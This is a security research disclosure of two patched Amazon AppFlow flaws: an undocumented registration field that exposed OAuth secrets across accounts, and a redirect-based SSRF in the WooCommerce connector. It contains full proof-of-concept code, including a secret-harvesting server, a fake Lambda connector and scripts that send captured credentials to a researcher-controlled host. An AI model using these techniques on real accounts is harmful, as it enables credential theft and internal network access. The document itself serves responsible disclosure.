Amazon AppFlow vulnerabilities: Undocumented API allowed reading partial secrets, SSRF in WooCommerce connector

OSRU @ Ronin //

Amazon AppFlow is a fully managed integration service for transferring data between software-as-a-service (SaaS) applications (for example, Salesforce, Zendesk, Slack, and ServiceNow) and AWS services.

The security research team at Ronin discovered two vulnerabilities in AppFlow and responsibly disclosed them to the AWS Security team, who have since remediated them.

The Amazon AppFlow team audited the service logs and confirmed that neither issue had been exploited.

Undocumented API allowed reading partial secrets

The AWS service teams publish API models that are used by AWS SDKs for consuming those services. These models contain service endpoint details, signing information, exposed operations, input/output structures, and required fields. These API models are meant to be public and may contain information about services that are internal-only, in development or test phases.

The AWS console is no exception: it is just a client built on the AWS JS SDK, and it needs these API models to consume the exposed services.

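As an aside, botocore (the Python SDK's core) ships the same kind of JSON API models on disk, so a hedged way to browse the published models locally is:

import os
import botocore

# Each directory under botocore's bundled data path holds dated service-2.json
# models describing that service's endpoints, operations, and shapes.
data_dir = os.path.join(os.path.dirname(botocore.__file__), "data")
for entry in sorted(os.listdir(data_dir)):
    if os.path.isdir(os.path.join(data_dir, entry)):
        print(entry)
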
While looking through the API models used by the AppFlow console, we stumbled upon a definition of the AppFlow service called sandstoneconfigurationservicelambda.

Within the metadata, we saw that the serviceId was Appflow and that requests were signed with the appflow signing name. The API version was 2017-07-25, which led us to assume that this was an old service spec and that Sandstone was perhaps just an internal codename for AppFlow during its development.

{
  "version": "2.0",
  "metadata": {
    "apiVersion": "2017-07-25",
    "endpointPrefix": "sandstoneconfigurationservicelambda",
    "jsonVersion": "1.1",
    "protocol": "rest-json",
    "serviceAbbreviation": "Appflow",
    "serviceFullName": "Amazon Appflow",
    "serviceId": "Appflow",
    "signatureVersion": "v4",
    "signingName": "appflow",
    "uid": "sandstoneconfigurationservicelambda-2017-07-25"
  }
}

We then looked at the operations. They were similar to those in the newer AppFlow spec, but with a few differences in input fields. Some fields in /register-connector and /update-connector-registration stood out, notably awsOwnedManagedAppCredentialsArn, because they weren’t present in the newer spec.

We had already seen a field with a similar awsOwnedManagedApp prefix, awsOwnedManagedAppClientId, in the /describe-connector output for one of the first-party connectors.

Naturally, we tried supplying a Secret ARN in the awsOwnedManagedAppCredentialsArn field of the /register-connector call, and after a few attempts we noticed that it only worked for secrets managed by AppFlow that contain clientId and clientSecret. In CloudTrail, we saw that the calling principal for GetSecretValue was appflow.amazonaws.com.

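One hedged way to spot those calls in the victim account is to query CloudTrail's 90-day event history for GetSecretValue events, for example:

import boto3
import json

# Look up recent GetSecretValue events and print who made each call; for the
# AppFlow-initiated reads, the service principal appflow.amazonaws.com shows up
# as 'invokedBy' in the event detail.
ct = boto3.client('cloudtrail')
events = ct.lookup_events(
    LookupAttributes=[{'AttributeKey': 'EventName', 'AttributeValue': 'GetSecretValue'}],
    MaxResults=10,
)
for event in events['Events']:
    detail = json.loads(event['CloudTrailEvent'])
    print(event['EventTime'], detail.get('userIdentity', {}).get('invokedBy'))
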
All secrets created by AppFlow have a policy that allows the AppFlow service to manage them:

{
  "Effect": "Allow",
  "Principal": {
    "Service": "appflow.amazonaws.com"
  },
  "Action": [
    "secretsmanager:GetSecretValue",
    "secretsmanager:PutSecretValue",
    "secretsmanager:DeleteSecret",
    "secretsmanager:DescribeSecret",
    "secretsmanager:UpdateSecret"
  ],
  "Resource": "*"
}

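To inspect that policy on a given secret, the resource policy can be read back directly (a hedged sketch; the secret ARN is a placeholder):

import boto3

sm = boto3.client('secretsmanager')
# Returns the resource-based policy document attached to the secret, if any
policy = sm.get_resource_policy(SecretId='<AppFlow-managed secret ARN>')
print(policy.get('ResourcePolicy'))
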
We proceeded to create a connection profile for a random AppFlow connector in another AWS account and used its secret ARN in our connector registration call, and it worked! The registration call succeeded, and the describe-connector call returned the clientId value from the secret stored in our other account.

TLDR

Summary

This vulnerability allowed anyone to steal secrets managed by AppFlow in any AWS account.

It was made possible by supplying the undocumented field awsOwnedManagedAppCredentialsArn during connector registration and connector updates. We believe the field was intended for managed OAuth apps (we only found the SharePoint connector making use of it).

Preconditions

  • We needed to know the ARN of the victim’s secret (see note below).
  • The victim’s secret had to belong to a connection profile that uses OAuth or otherwise contains clientId and clientSecret.

Steps

  1. We created a Lambda function that mimicked an OAuth2-capable connector in order to pass the registration tests. Its token URL pointed to a server we controlled; this was needed later to capture the secrets passed on by AppFlow during token exchange.
  2. Registered the connector normally but supplied awsOwnedManagedAppCredentialsArn with the victim’s secret ARN.
  3. After the connector was registered, we were able to see the clientId in the describe-connector response at path $.connectorConfiguration.authenticationConfig.oAuth2Defaults.awsOwnedManagedAppClientId.
  4. Getting the clientSecret was a bit trickier: we had to attempt creating a connection with the connector. We pointed the tokenUrl (mentioned in step 1) at a server we controlled and recorded whatever was sent during the exchange process.

NOTE: The good news is that all secret ARNs in AWS Secrets Manager contain not only the unique human-provided secret name (which could be brute-forced with a common word dictionary) but also six random characters (these appear to be upper- and lower-case ASCII letters, i.e. 52^6, or close to 20 billion possibilities), making brute-force exploitation of this vulnerability impractical. In practice, the attacker would have needed to know not only the account number but also the full ARN, including the six random characters of the secret, before exploiting the flaw.

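A quick back-of-the-envelope check of that estimate:

# six random characters, each one of 52 upper/lower-case ASCII letters
print(52 ** 6)   # 19770609664, roughly 19.8 billion possibilities
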
Testing

We created a detailed proof-of-concept with all the elements required to make it work.

Server

A basic web application was created to harvest the clientSecret values that were passed on by AppFlow to the OAuth server’s /token endpoint.

const express = require('express')
const { LRUCache } = require('lru-cache')
const app = express()
const port = 8082

const records = new LRUCache({max: 50})

app.use(express.json())
app.use(express.urlencoded({ extended: true }));

app.post('/record/:id', (req, res) => {
  const id = req.params.id
  records.set(id, {
    headers: req.headers,
    query: req.query,
    body: req.body,
  })
  res.json({
    'ok': 'ok'
  })
})

app.get('/record/:id', (req, res) => {
  const id = req.params.id
  if (records.has(id)) {
    res.json(records.get(id))
  } else {
    res.json({
      'error': 'not found'
    })
  }
})

app.get('*', (req, res) => {
  res.json({
    'health': 'UP'
  })
})

app.listen(port, () => {
  console.log(`App listening on port ${port}`)
})

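As a quick local sanity check of the harvesting server (a hedged example assuming it runs on localhost:8082), we can post a fake token exchange and read it back:

import requests

# simulate the form-encoded token exchange AppFlow would send, then read it back
requests.post(
    "http://localhost:8082/record/test-1",
    data={"client_id": "x", "client_secret": "y", "grant_type": "authorization_code"},
)
print(requests.get("http://localhost:8082/record/test-1").json())
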
Custom Connector

For this vulnerability to work, we needed a valid OAuth-capable connector. A simple connector was created using the following code, with just enough functionality to pass the registration tests.

The ARN of this Lambda function is used later in the harvesting steps.

export const handler = async(event) => {
    if (event.type === 'DescribeConnectorConfigurationRequest') {
        return {
          "connectorOwner": "SampleConnector",
          "connectorName": "SampleRoninDebugConnector",
          "connectorVersion": "1.0",
          "connectorModes": [
            "SOURCE"
          ],
          "authenticationConfig": {
            "oAuth2Defaults": {
              "oAuthScopes": [
                "openid"
              ],
              "tokenURL": [
                "https://xxx.ronin.engineering/"
              ],
              "authURL": [
                "https://xxx.ronin.engineering/"
              ],
              "oAuth2GrantTypesSupported": [
                "AUTHORIZATION_CODE"
              ],
              "oAuth2ContentType": "URL_ENCODED",
              "oAuth2MethodType": "HTTP_POST"
            },
            "isOAuth2Supported": true
          },
          "connectorRuntimeSetting": [
          ],
          "supportedApiVersions": [
            "v1.0"
          ],
          "operatorsSupported": [
            "PROJECTION",
            "LESS_THAN",
            "GREATER_THAN",
            "BETWEEN",
            "LESS_THAN_OR_EQUAL_TO",
            "GREATER_THAN_OR_EQUAL_TO",
            "EQUAL_TO",
            "CONTAINS",
            "NOT_EQUAL_TO",
            "ADDITION",
            "SUBTRACTION",
            "MULTIPLICATION",
            "DIVISION",
            "MASK_ALL",
            "MASK_FIRST_N",
            "MASK_LAST_N",
            "VALIDATE_NON_NULL",
            "VALIDATE_NON_ZERO",
            "VALIDATE_NON_NEGATIVE",
            "VALIDATE_NUMERIC",
            "NO_OP"
          ],
          "supportedTriggerTypes": [
            "SCHEDULED",
            "ONDEMAND"
          ],
          "triggerFrequenciesSupported": [
            "BYMINUTE",
            "HOURLY",
            "DAILY",
            "WEEKLY",
            "MONTHLY",
            "ONCE"
          ],
          "supportedWriteOperations": [
            
          ],
          "isSuccess": true
        }
    }
    
    return {
        statusCode: 200,
        body: JSON.stringify('Unknown type'),
    };
};

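One detail worth noting: for AppFlow to invoke a Lambda-backed connector, the function's resource-based policy generally has to allow the AppFlow service principal. A hedged sketch with boto3 (the function name and statement ID are placeholders):

import boto3

lam = boto3.client('lambda')
# Grant the AppFlow service principal permission to invoke the connector function
lam.add_permission(
    FunctionName='<our connector lambda>',
    StatementId='appflow-invoke',
    Action='lambda:InvokeFunction',
    Principal='appflow.amazonaws.com',
)
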
Setting up a victim

To set up a victim account, we either needed to create a connection profile for a real OAuth-supported connector, or we could simply add clientId and clientSecret values to the managed secret of any existing profile. The following POC script does the latter because it is simpler.

import boto3
import json

af = boto3.client('appflow')
sm = boto3.client('secretsmanager')

def get_secret_arn(name):
    response = af.describe_connector_profiles(
        connectorProfileNames=[
            name,
        ],
    )
    return response['connectorProfileDetails'][0]['credentialsArn']

def append_secrets(arn, new_secrets = {}):
    response = sm.get_secret_value(
        SecretId=arn,
    )

    val = json.loads(response['SecretString'])

    val.update(new_secrets)

    sm.put_secret_value(
        SecretId=arn,
        SecretString=json.dumps(val),
    )

    return val

def create_example_connection(name):
    print("Creating connection profile:", name)
    try:
        af.create_connector_profile(
            connectorProfileName=name,
            connectionMode='Public',
            connectorType='CustomConnector',
            connectorLabel='WooCommerce',
            connectorProfileConfig={
                "connectorProfileProperties": {
                    "CustomConnector": {
                            "profileProperties": {
                            "instanceUrl": "https://checkip.amazonaws.com/"
                        }
                    }
                },
                "connectorProfileCredentials": {
                    "CustomConnector": {
                        "authenticationType": "CUSTOM",
                        "custom": {
                            "customAuthenticationType": "api_key",
                            "credentialsMap": {
                                "consumerKey": "no-val",
                                "consumerSecret": "no-val",
                            }
                        }
                    }
                }
            }
        )
    except af.exceptions.ConflictException:
        pass

name = 'example-victim-connector'

create_example_connection(name)
arn = get_secret_arn(name)

print("Credential ARN: %s, adding clientId and clientSecret for the POC" % (arn))

val = append_secrets(arn, {
    'clientId': 'MyNotSoSecretClientId',
    'clientSecret': 'MySuperSecretValue123',
})

print(json.dumps(val, indent=2))

with open("appflow_secret.arn", "w") as f:
    f.write(arn)

print("Wrote the secret ARN to the file, proceed with the next script")

Harvest Secrets

  1. We registered (or updated) our connector with the victim’s Secret ARN and our Lambda function ARN.
  2. Retrieved the clientId from the describe-connector call.
  3. Attempted to create a connection profile using a dummy authCode and a tokenUrl pointing to our server.
  4. Retrieved what was sent to the tokenUrl endpoint. It contained the clientId and clientSecret.

import boto3
import json
import io
import requests
from aws_requests_auth.boto_utils import BotoAWSRequestsAuth
import time
import uuid

af = boto3.client('appflow')
iam = boto3.client('iam')
function_arn = "<ARN of our deployed lambda>"

session_region = boto3.session.Session().region_name

auth = BotoAWSRequestsAuth(
    aws_host="appflow.%s.amazonaws.com" % (session_region),
    aws_region=session_region,
    aws_service="appflow"
)

# non standard API call, uses undocumented field
def register_connector(region, name, lambda_arn, victim_secret_arn):
    response = requests.post(
        "https://appflow.%s.amazonaws.com/register-connector" % (region),
        json={
            "connectorLabel": name,
            "connectorProvisioningType": "LAMBDA",
            "description": "My AWS POC",
            "connectorProvisioningConfig": {
                "lambda": {
                    "lambdaArn": lambda_arn,
                }
            },
            "awsOwnedManagedAppCredentialsArn": victim_secret_arn,
            "RegisteredBy": "CUSTOM",
        },
        auth=auth
    )

    # if it already exists, update it with the new secret
    if "already exists" in response.text:
        response = requests.post(
            "https://appflow.%s.amazonaws.com/update-connector-registration" % (region),
            json={
                "connectorLabel": name,
                "description": "My AWS POC",
                "connectorProvisioningConfig": {
                    "lambda": {
                        "lambdaArn": lambda_arn,
                    }
                },
                "awsOwnedManagedAppCredentialsArn": victim_secret_arn,
                "RegisteredBy": "CUSTOM",
            },
            auth=auth
        )

    print(response.json())

def get_connector(region, name):
    response = requests.post(
        "https://appflow.%s.amazonaws.com/describe-connector" % (region),
        json={
            "connectorType": "CustomConnector",
            "connectorLabel": name,
        },
        auth=auth
    )

    return response.json()['connectorConfiguration']

def create_connection(region, name, connector_label, record_id):
    response = requests.post(
        "https://appflow.%s.amazonaws.com/create-connector-profile" % (region),
        json={
            "connectorProfileName": name,
            "connectionMode": "Public",
            "connectorType": "CustomConnector",
            "connectorLabel": connector_label,
            "connectorProfileConfig": {
                "connectorProfileProperties": {
                    "CustomConnector": {
                        "profileProperties": {},
                        "oAuth2Properties": {
                            "tokenUrl": "https://xxx.ronin.engineering/record/%s" % (record_id),
                            "oAuth2GrantType": "AUTHORIZATION_CODE",
                            "tokenUrlCustomProperties": {}
                        }
                    }
                },
                "connectorProfileCredentials": {
                    "CustomConnector": {
                        "oauth2": {
                            "oAuthRequest": {
                                "authCode": "dummy-code",
                                "redirectUri": "https://%s.console.aws.amazon.com/appflow/oauth" % (region)
                            }
                        },
                        "authenticationType": "OAUTH2"
                    }
                }
            }
        },
        auth=auth
    )
    # we expect an error - Authentication exception from connector: Error while deserializing auth response
    print(response.text)

victim_secret_arn = open('appflow_secret.arn', 'r').read()

connector_label = 'MyConnectorPOC'

register_connector(session_region, connector_label, function_arn, victim_secret_arn)

connector = get_connector(session_region, connector_label)

client_id = connector['authenticationConfig']['oAuth2Defaults']['awsOwnedManagedAppClientId']

# client ID can be retrieved from the describe-connector
print()
print("Client ID:",client_id)
print()

# client secret is tricky, it's only sent to the token endpoint
random_id = str(uuid.uuid4())

# we expect it to fail as the response from our server won't be deserialized correctly
# we just use it to record the secret sent
create_connection(session_region, 'appflow-connection-poc', connector_label, random_id)
print()

res = requests.get("https://xxx.ronin.engineering/record/%s" % (random_id))

print(json.dumps(res.json(), indent=2))

The request we received from AppFlow for token exchange:

{
  "headers": {
    "x-forwarded-for": "3.248.186.93",
    "host": "localhost:8082",
    "connection": "close",
    "content-length": "190",
    "accept": "application/json",
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
    "user-agent": "Apache-HttpClient/UNAVAILABLE (Java/1.8.0_372)",
    "accept-encoding": "gzip,deflate"
  },
  "query": {},
  "body": {
    "client_id": "MyNotSoSecretClientId",
    "client_secret": "MySuperSecretValue123",
    "grant_type": "authorization_code",
    "redirect_uri": "https://eu-west-1.console.aws.amazon.com/appflow/oauth",
    "code": "dummy-code"
  }
}

We also noticed that the access was persistent: if we updated clientId or clientSecret in the victim’s account, we received the new values in our describe-connector calls and in the harvesting steps. The values were never cached and were always retrieved fresh by AppFlow using GetSecretValue.

SSRF using redirects

Server-side request forgery (SSRF) is a web security vulnerability that allows an attacker to cause the server-side application to make requests to an unintended location.

AppFlow is all about data integrations between AWS and external services, and it provides first-party connectors for popular services. This means that the customer gets to define where their application is, what its credentials are, and so on, for the integration to work.

We chose the WooCommerce connector for our test because it allowed us to enter a full URL for the instance. Other connectors at the time didn’t let us supply full URLs, or had other requirements that we didn’t have access to. Since WooCommerce is packaged as a WordPress plugin and can be deployed anywhere, AppFlow accepted any URL as a WooCommerce instance as long as it returned an HTTP 200 OK response.

This can also be done programmatically using the AWS SDK.

import boto3

client = boto3.client('appflow')

name = 'test-connection'
redirector_service = 'https://xxx.ronin.engineering'
client.create_connector_profile(
    connectorProfileName=name,
    connectionMode='Public',
    connectorType='CustomConnector',
    connectorLabel='WooCommerce',
    connectorProfileConfig={
        "connectorProfileProperties": {
            "CustomConnector": {
                    "profileProperties": {
                    "instanceUrl": redirector_service
                }
            }
        },
        "connectorProfileCredentials": {
            "CustomConnector": {
                "authenticationType": "CUSTOM",
                "custom": {
                    "customAuthenticationType": "api_key",
                    "credentialsMap": {
                        "consumerKey": "example",
                        "consumerSecret": "example"
                    }
                }
            }
        }
    }
)

We set up a flow with the new connection that we had created, using the coupon entity as an example. The sink was set to an S3 bucket. We didn’t really care about the entity; we just wanted AppFlow to make a request to our instance.

connection_profile_name = 'test-connection'
sink_bucket = '<our S3 sink bucket>'   # placeholder: destination bucket in our own account

client.create_flow(
    flowName=name,   # 'client' and 'name' are carried over from the previous snippet
    description='SSRF POC',
    triggerConfig={
        "triggerType": "OnDemand"
    },
    sourceFlowConfig={
        "connectorType": "CustomConnector",
        "connectorProfileName": connection_profile_name,
        "apiVersion": "v3",
        "sourceConnectorProperties": {
            "CustomConnector": {
                "entityName": "coupon",
                "customProperties": {

                }
            }
        }
    },
    destinationFlowConfigList=[
        {
            "connectorType": "S3",
            "destinationConnectorProperties": {
                "S3": {
                    "bucketName": sink_bucket,
                    "bucketPrefix": "",
                    "s3OutputFormatConfig": {
                        "fileType": "JSON",
                        "prefixConfig": {
                            "pathPrefixHierarchy": [
                                "EXECUTION_ID"
                            ]
                        },
                        "aggregationConfig": {
                            "aggregationType": "None"
                        }
                    }
                }
            }
        }
    ],
    tasks=[
        {
            "taskType": "Filter",
            "sourceFields": [
                "id"
            ],
            "taskProperties": {

            },
            "connectorOperator": {
                "CustomConnector": "PROJECTION"
            }
        },
        {
            "taskType": "Map",
            "sourceFields": [
                "id"
            ],
            "taskProperties": {
                "SOURCE_DATA_TYPE": "Integer",
                "DESTINATION_DATA_TYPE": "Integer"
            },
            "destinationField": "id",
            "connectorOperator": {
                "CustomConnector": "NO_OP"
            }
        }
    ],
    tags={},
    metadataCatalogConfig={}
)

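To actually trigger the request, the on-demand flow has to be started and its run records read back. A hedged sketch reusing the client and flow name from the snippet above:

import time

# Start the on-demand flow, give it a moment, then read its execution records;
# the connector error message (which echoes part of the fetched response) lands there.
client.start_flow(flowName=name)
time.sleep(60)  # crude wait for the run to finish

records = client.describe_flow_execution_records(flowName=name)
for execution in records['flowExecutions']:
    print(execution.get('executionStatus'),
          execution.get('executionResult', {}).get('errorInfo'))
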
Our server responded to all requests with a 200 status and a JSON body of {"health":"UP"}. After we ran the flow, we saw that the response from our server was written to the run logs.

The request failed because the service Source WooCommerce returned the following error: Details: The response from the connector application couldn't be parsed because of the following error: %sCannot deserialize value of type `java.util.ArrayList<com.amazonaws.appflow.connector.woocommerce.model.WooCommerceStringQueryResponse>` from Object value (token `JsonToken.START_OBJECT`) at [Source: (byte[])"{"health":"UP"}"; line: 1, column: 1], ErrorCode: ServerError.

We then set up a 302 redirect to https://checkip.amazonaws.com for all requests and ran the flow again. To our surprise, AppFlow followed the redirect and consumed the contents. The flow failed as expected because it couldn’t parse the response; it expected well-formed JSON output for the coupon entity.

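For reference, a minimal sketch of that redirect step (our actual server was the Express app shown earlier; this only illustrates answering every request with a 302):

from http.server import BaseHTTPRequestHandler, HTTPServer

class Redirector(BaseHTTPRequestHandler):
    def do_GET(self):
        # send the connector's HTTP client elsewhere instead of returning a 200 body
        self.send_response(302)
        self.send_header("Location", "https://checkip.amazonaws.com/")
        self.end_headers()

HTTPServer(("0.0.0.0", 8082), Redirector).serve_forever()
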
The error now contained the contents of https://checkip.amazonaws.com, which presumably was one of the outbound IP addresses of the WooCommerce connector.

This confirmed that we could make arbitrary GET requests to any URL from the WooCommerce connector.

The describe-connectors call shows that the provisioning type for the WooCommerce connector is LAMBDA, which means it runs as a Lambda function, and we should be able to access HTTP resources inside its Lambda runtime environment.

{
  "connectorDescription": "Appflow managed connector registration test",
  "connectorLabel": "WooCommerce",
  "connectorModes": [
    "SOURCE"
  ],
  "connectorName": "WooCommerce",
  "connectorOwner": "AWS",
  "connectorProvisioningType": "LAMBDA",
  "connectorType": "CustomConnector",
  "connectorVersion": "1.0",
  "registeredAt": 1674081093.708,
  "registeredBy": "AWS"
}

We wanted to see whether the Rapid runtime API would return request payloads for other customers using the same connector when a forged request was made to http://127.0.0.1:9001/2018-06-01/runtime/invocation/next. It didn’t work for us: we were only able to see the payload of our own request that was being processed.

The response included in the error was truncated to 500 characters. For us, this was enough to let AWS Security know about the URL validation bug and the SSRF caused by the HTTP client following redirects.

Disclosure timeline

  • Jun 21, 2023: Ronin reports the SSRF finding to AWS
  • Jun 22, 2023: AWS requests a POC
  • Jun 22, 2023: Ronin sends a POC for the SSRF issue
  • Jun 24, 2023: Ronin reports the secrets issue to AWS with a POC
  • Jul 06, 2023: AWS asks for clarifications, Ronin provides clarifications
  • Aug 22, 2023: AWS reported that it was in the process of deploying fixes
  • Sep 18, 2023: AWS successfully deploys changes
  • Nov 06, 2023: Ronin releases public disclosure

Acknowledgements

We want to express our sincere gratitude to Alexis F., Albin V. and the rest of the AWS Security Outreach team for always being a pleasure to deal with.